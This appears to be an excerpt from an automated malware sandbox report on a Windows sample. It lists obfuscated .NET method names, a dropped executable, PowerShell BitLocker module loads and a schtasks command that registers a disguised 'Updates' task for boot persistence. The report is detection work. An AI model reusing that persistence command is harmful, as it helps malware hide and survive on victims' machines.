Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, OV8DiuNoXKJ1WB8qPq.cs	High entropy of concatenated method names: 'DL35V15Wek', 'cgr54M44DR', 'wFk5gf2K4V', 'alt5Xjbo1A', 'Gj95S3fhfo', 'rxF5TQD72e', 'gUw59Yy9jS', 'JHn5oe1N1l', 'JYM5f9PGGV', 'Jna5POKo98'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	High entropy of concatenated method names: 't6d3LND1sI', 'eh23GqEbEj', 'fFB3EnwgLE', 'J1x3BtrgKv', 'MR13j78E7Q', 'W0L3KBBFiu', 'WWs3HGgUdx', 'qXI3UJEAVF', 'Anh365YVuM', 'liF3CrRK38'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, axawa0e8J13q1G2Nlm.cs	High entropy of concatenated method names: 'CiDip15JnW', 'B4mil4ZfMT', 'qMNi30bBtY', 'yAXiqYpicF', 'PujikS4qMQ', 'Nirin931xt', 'EOTi5iJqPx', 'Clgie9xXYc', 'BpeiYacQO5', 'mbYisreu3T'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, ipJKph3hCPVZGq4cIy.cs	High entropy of concatenated method names: 'Dispose', 'i3S06hbQsc', 'oUNOwoupdE', 'LhhK37vI3H', 'MDl0CMrUA5', 'uDk0zed0Rw', 'ProcessDialogKey', 'WR0O1WqZSR', 'GJVO0eemCg', 'i42OOPhJ7U'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, S9rtuWRAkxKyMMtRDc.cs	High entropy of concatenated method names: 's3U05HI4wF', 'jLx0em6mj0', 'wJA0syd6tJ', 'luD08ifJSs', 'pFl0It9FTM', 'BRk02pAEQZ', 'TC9fJvql0uhRHvIb7d', 'N9txlwYT0OOCmuSghX', 'rfE00pDFqs', 'jAe0iSa7Sf'
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, uPnEWS0O8I3FsUjr0J4.cs	High entropy of concatenated method names: 'ToString', 'xyCuoTGkDq', 'lEFufAB227', 'w9AuP2sqgS', 'sppu7pQ1hL', 'FyMuwpSie9', 'UIquv56De2', 'KyJuahdIo7', 'Sh3D7NyR2EUvOZI4lDp', 'AHmmMey891W6TXqxxr4'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, wnCD18BPY1ySBaFg0f.cs	High entropy of concatenated method names: 'uR5Js2AxCM', 'TTMJ8dQDI1', 'ToString', 'iD0Jl4m30Z', 'ccmJ32AcUU', 'wrHJqOi2vj', 'ShwJkirRfe', 'tNAJnHdg4G', 'cFxJ56RmQV', 'AOaJeiCNGE'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, KUbYdcz16KmiRRVpZI.cs	High entropy of concatenated method names: 'gC7rTLoUGM', 'uZbrocinWF', 'atIrf7ktaq', 'Yhwr7O4LYa', 'Si1rwsdJD3', 'UFdraDe7Vu', 'rVTrAqFTWR', 'pP8rZlfdxZ', 'MB0rVctP2L', 'aLEr41rMSu'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, dmuRry0R4f29ZyiNJV7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oPnbyvHwst', 'eVybrFQQwI', 'h3ebuUNeBU', 'pJcbbUbv1i', 'OHybMK7B2s', 'jxxbmjTiLx', 'Lp7bZet0wi'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, ct6L4ZfJAyd6tJsuDi.cs	High entropy of concatenated method names: 'KTRqXy0kcW', 'dBcqTDFXUI', 'n5Mqo36WFs', 'cutqfEi4qE', 'du2qIqyBZV', 'sSUq2Tylmm', 'VVeqJBUBA4', 'OTiqhg38jZ', 'o07qyJH1ic', 'xpFqreuNLP'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, THrO1aHPMk3ShbQscN.cs	High entropy of concatenated method names: 'IUSyIS6e9q', 'onByJYqj4H', 'oJvyyWKmDX', 'HbIyuyTGo5', 'BEEyMtwYMs', 'vUdyZna1Ft', 'Dispose', 'rR8hlC2yRE', 'ATph3DAOAb', 'mDghqlDcUS'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, LTMSRk7pAEQZ7FSNba.cs	High entropy of concatenated method names: 'eeBnpHAFQk', 'MoOn3UPx9p', 'lIXnkmAckw', 'gxLn5X5p5I', 'X40neZf0uf', 'TswkjrskYq', 'pJwkKQ6pme', 'vQukHPXlwP', 'RVikUQoHJM', 'lBAk60rQVq'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, EJSsDAPTcC8ha2Flt9.cs	High entropy of concatenated method names: 'VYDkSl7ETN', 'tAqk96jS7u', 'pB7qv6B4Vc', 'muRqaBt7qq', 'VbOqAl7MGo', 'K8oqxR3kfT', 'EDGqFAPMqX', 'qi4qWBsmlh', 'JjCqNhoLkA', 'sp5qtVABeN'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, tjBPX3OKayP28WKmQP.cs	High entropy of concatenated method names: 'uYcgA9BDR', 'uAeX1J8Mr', 'n6fT9iIJt', 'JZB99TPvx', 'TEAfB4935', 'na2PqNvrv', 'kY2egYCUw6Au0rrVZF', 'pUQlhmxVDDplgpjkSo', 'W7nhbNi9h', 'OqUrcPU3A'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, B6Oy4T0iPxqP5Qy22F9.cs	High entropy of concatenated method names: 'mRZuCmAUnF', 'QsouzUGXgS', 'wExb1Rd2O4', 'Yo67V3yidu8T7V4rZO0', 'dSA3J9yYoviMyZVJK4N', 'uRIrMOyTI40qUSV5iiu', 'JxfDqCyEjDGSq73Yn0a', 'LyZUl4yoHemFudPg2bN', 'JERynlyNjLOBLXWYmOi', 'xolcQXy7dQKVxxDYthS'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, F3nSH600wfw7ADp7v4w.cs	High entropy of concatenated method names: 'PurrCKSOC4', 'uQ5rzE3ebn', 'Pq9u1RjiD0', 'FNAu0TSa1V', 'kCjuOyEVeH', 'BW3uiGXVec', 'qg5uRAicjT', 'QOyupHcxNj', 'RsdulQyWCF', 'fFEu34gyoH'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, FhJ7UUCyJc9ayBfnHi.cs	High entropy of concatenated method names: 'SoKrqiUIMf', 'mG7rkdGtxT', 'WvprntnfXr', 'FRFr5ggHqt', 'L4GryTC2Bq', 'M6ureiI6k0', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, bWqZSR6wJVeemCgk42.cs	High entropy of concatenated method names: 'gFCy7TTuNV', 'Eq9ywXRhoO', 'AoLyvq4Eab', 'rtuyaTTonT', 'SB4yAE1NPo', 'C2JyxcVY5i', 'gDayF27BgO', 'uIEyWMXbqg', 'eKeyNen9Xy', 'f1ayttRHBo'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, cKhAUwdPfOInnNbrT4.cs	High entropy of concatenated method names: 'Fx5DoXclfU', 'hrUDflCRVI', 'c9eD7mpUK0', 'QNXDwE8bVC', 'HhjDaO00gR', 'I4YDAoWB2R', 'E3qDF3UeKE', 'lC8DWkJroI', 'ILkDtT6R8Z', 'RuFDc4nGPQ'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, hiHYZDEx38O3c4V0Tx.cs	High entropy of concatenated method names: 'ToString', 'mqm2chLJwH', 'wOe2wtF5oW', 'UsK2v8bb1R', 'Slc2aUiY43', 'wYp2AxfBwM', 'HRr2xpooTb', 'u5W2FCbiT8', 'QXB2W4f4YN', 'qde2Nujhfc'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, W8OZKFKJReJpbCtRpp.cs	High entropy of concatenated method names: 'FeDJUERwZv', 'XlaJCSiuv5', 'MHxh1b9P4O', 'A8Uh0SjVkN', 'P15JcxbWMf', 'vHHJQKaOP9', 'KhuJdoZx0F', 'UW5JLfmQMq', 'rleJGYmxlN', 'OvaJEe3jVO'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, hucbFkLMtRp98Z8h5K.cs	High entropy of concatenated method names: 'EaHItdxC05', 'AZXIQYC8mG', 'oV3IL2hBfP', 'oKgIGSxyxg', 'RHXIw1JYt8', 'llsIvFx8Yi', 'xVuIao2Sk8', 'mnOIAMIC6B', 'KmYIxAjoMZ', 'HoDIFmYw1Z'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, OV8DiuNoXKJ1WB8qPq.cs	High entropy of concatenated method names: 'DL35V15Wek', 'cgr54M44DR', 'wFk5gf2K4V', 'alt5Xjbo1A', 'Gj95S3fhfo', 'rxF5TQD72e', 'gUw59Yy9jS', 'JHn5oe1N1l', 'JYM5f9PGGV', 'Jna5POKo98'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	High entropy of concatenated method names: 't6d3LND1sI', 'eh23GqEbEj', 'fFB3EnwgLE', 'J1x3BtrgKv', 'MR13j78E7Q', 'W0L3KBBFiu', 'WWs3HGgUdx', 'qXI3UJEAVF', 'Anh365YVuM', 'liF3CrRK38'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, axawa0e8J13q1G2Nlm.cs	High entropy of concatenated method names: 'CiDip15JnW', 'B4mil4ZfMT', 'qMNi30bBtY', 'yAXiqYpicF', 'PujikS4qMQ', 'Nirin931xt', 'EOTi5iJqPx', 'Clgie9xXYc', 'BpeiYacQO5', 'mbYisreu3T'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, ipJKph3hCPVZGq4cIy.cs	High entropy of concatenated method names: 'Dispose', 'i3S06hbQsc', 'oUNOwoupdE', 'LhhK37vI3H', 'MDl0CMrUA5', 'uDk0zed0Rw', 'ProcessDialogKey', 'WR0O1WqZSR', 'GJVO0eemCg', 'i42OOPhJ7U'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, S9rtuWRAkxKyMMtRDc.cs	High entropy of concatenated method names: 's3U05HI4wF', 'jLx0em6mj0', 'wJA0syd6tJ', 'luD08ifJSs', 'pFl0It9FTM', 'BRk02pAEQZ', 'TC9fJvql0uhRHvIb7d', 'N9txlwYT0OOCmuSghX', 'rfE00pDFqs', 'jAe0iSa7Sf'
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, uPnEWS0O8I3FsUjr0J4.cs	High entropy of concatenated method names: 'ToString', 'xyCuoTGkDq', 'lEFufAB227', 'w9AuP2sqgS', 'sppu7pQ1hL', 'FyMuwpSie9', 'UIquv56De2', 'KyJuahdIo7', 'Sh3D7NyR2EUvOZI4lDp', 'AHmmMey891W6TXqxxr4'

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

File created: C:\Users\user\AppData\Roaming\lpIWQr.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

7_2_00417B1A

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
